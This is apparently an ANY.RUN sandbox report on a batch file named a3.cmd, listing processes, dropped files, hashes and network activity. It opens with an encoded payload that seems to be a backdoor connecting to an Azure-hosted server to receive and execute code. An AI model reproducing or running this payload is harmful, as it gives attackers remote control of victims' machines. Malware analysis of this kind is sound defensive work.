6AEIAZABDAGcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEgAQgB5AEkARAAwAGcAYwBDAGgAeQBKADAAaABCAFUAawBSAFgAUQBWAEoARgBYAEYAeABFAFIAVgBOAEQAVQBrAGwAUQBWAEUAbABQAFQAbAB4AGMAVQAzAGwAegBkAEcAVgB0AFgARgB4AEQAWgBXADUAMABjAG0ARgBzAFUASABKAHYAWQAyAFYAegBjADIAOQB5AFgARgB3AHcASgB5AHcAZwBKADEAQgB5AGIAMgBOAGwAYwAzAE4AdgBjAGsANQBoAGIAVwBWAFQAZABIAEoAcABiAG0AYwBuAEsAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkASABaAHoASQBEADAAZwBjAEMAaAB5AEoAMQBOAFAAUgBsAFIAWABRAFYASgBGAFgARgB4AE4AYQBXAE4AeQBiADMATgB2AFoAbgBSAGMAWABGAGQAcABiAG0AUgB2AGQAMwBNAGcAVABsAFIAYwBYAEUATgAxAGMAbgBKAGwAYgBuAFIAVwBaAFgASgB6AGEAVwA5AHUASgB5AHcAZwBKADEAQgB5AGIAMgBSADEAWQAzAFIATwBZAFcAMQBsAEoAeQBrAEsAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcAYQBXAFkAZwBKADAASgB5AGIAMgBGAGsAZAAyAFYAcwBiAEMAYwBnAGEAVwA0AGcAYwBIAEkANgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBKAHkAWgBXAEYAcgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBkADIAbAAwAGEAQwBCAHoAYwB5ADUAegBiADIATgByAFoAWABRAG8AYwAzAE0AdQBRAFUAWgBmAFMAVQA1AEYAVgBDAHcAZwBjADMATQB1AFUAMAA5AEQAUwAxADkAVABWAEYASgBGAFEAVQAwAHAASQBHAEYAegBJAEgATQA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAE0AdQBjADIAVgAwAGQARwBsAHQAWgBXADkAMQBkAEMAZwB6AE0AQwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBjAHkANQBqAGIAMgA1AHUAWgBXAE4AMABLAEMAaABtAEoAMwB0AGoAYQBHADkAcABZADIAVQBvAGIARwBzAG8ASwBWAHMAMABPAGwAMABwAGYAUwA1AGkAYwBtAEYANgBhAFcAeAB6AGIAMwBWADAAYQBDADUAagBiAEcAOQAxAFoARwBGAHcAYwBDADUAaABlAG4AVgB5AFoAUwA1AGoAYgAyADAAbgBMAEMAQgBqAGEARwA5AHAAWQAyAFUAbwBjAEgAUQBvAEsAUwBrAHAASwBRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB6AEwAbgBOAGwAYgBtAFEAbwBaAGkAZAB3AGUAVQBOAHYAWgBHAFYAVwBNAFMAQQB0AEkAQwBwAE8AUgBWAGMAcQBJAEgAdAB6AGMAeQA1AG4AWgBYAFIAbwBiADMATgAwAGIAbQBGAHQAWgBTAGcAcABmAFMAQgA4AEkASAB0ADIAYwAzADAAZwBmAEMAQgA3AGMASABKADkASgB5ADUAbABiAG0ATgB2AFoARwBVAG8ASwBTAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMAMgB4AGwAWgBYAEEAbwBNAGkAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYQBXADUAbQBiADEAOQBpAGEAVwA0AGcAUABTAEIAaQBKAHkAYwBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAZAAyAGgAcABiAEcAVQBnAFYASABKADEAWgBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAE0AZwBQAFMAQgB6AEwAbgBKAGwAWQAzAFkAbwBNAGoAQQAwAE8AQwBvAHgATQBEAEEAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAcABaAGkAQgB1AGIAMwBRAGcAWQB6AG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgBpAGMAbQBWAGgAYQB3AG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYQBXADUAbQBiADEAOQBpAGEAVwA0AGcASwB6ADAAZwBZAHcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHAAYgBtAFoAdgBJAEQAMABnAGMARwBsAGoAYQAyAHgAbABMAG0AeAB2AFkAVwBSAHoASwBHAGwAdQBaAG0AOQBmAFkAbQBsAHUASwBRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgBsAGUARwBWAGoASwBHAGwAdQBaAG0AOQBiAEoAMABOAHYAWgBHAFYAUQBlAFMAZABkAEwAQwBCADcASgAyAFIAaABkAEcARgBTAFoAVwBNAG4ATwBpAEIAcABiAG0AWgB2AFcAeQBkAG0AYQBXAHgAbABKADEAMABzAEkAQwBkAHcAZQBXADEAdABKAHoAbwBnAGEAVwA1AG0AYgAxAHMAbgBaAG0bABzAFoAVABJAG4AWABTAHcAZwBKADEATgBoAGQAbQBWAFMAWgBXAGQAbgBaADIAYwBuAE8AaQBCAHoAYwB5ADUAbgBaAFgAUgBvAGIAMwBOADAAYgBtAEYAdABaAFMAZwBwAEwAbgBKAGwAYwBHAHgAaABZADIAVQBvAEoAeQAwAG4ATABDAEEAbgBKAHkAawB1AGMAbQBWAHcAYgBHAEYAagBaAFMAZwBuAEkAQwBjAHMASQBDAGMAbgBLAFgAMABwAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAEoAeQBaAFcARgByAEMAaQBBAGcASQBDAEIAbABlAEcATgBsAGMASABRADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcAYwAyAHgAbABaAFgAQQBvAE0AaQBrAEsAQwBnAD0APQAnACcAJwApACkAOwAgAGUAeABpAHQAKAApACIAIgAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294770688
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3916C:\Windows\system32\cmd.exe /K "C:\Users\admin\Downloads\a3.cmd" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294770688
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
4052C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Downloads\a3.cmd" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
4 179
Read events
4 127
Write events
52
Delete events
0

Modification events

(PID) Process:(3392) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
0
Suspicious files
5
Text files
0
Unknown types
4

Dropped files

PID
Process
Filename
Type
748powershell.exeC:\Users\admin\AppData\Local\Temp\bihyjf4d.0dj.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3392powershell.exeC:\Users\admin\AppData\Local\Temp\v5unpx5r.fqd.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
748powershell.exeC:\Users\admin\AppData\Local\Temp\sujrcddl.rih.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3720powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
748powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:67BC9011476C87B42100EDEB9660C156
SHA256:1332A0F6F56E228FD1BF8D1756BBA448C457E74C26A8E2DDA9F0BA80BE65F1BC
3392powershell.exeC:\Users\admin\AppData\Local\Temp\pr3jwjip.uml.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PUWULLHX5JXKH4C7PX7Y.tempbinary
MD5:67BC9011476C87B42100EDEB9660C156
SHA256:1332A0F6F56E228FD1BF8D1756BBA448C457E74C26A8E2DDA9F0BA80BE65F1BC
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18b67a.TMPbinary
MD5:0268C3470C936E6FBAC2945B9E1C2099
SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
a3.cmd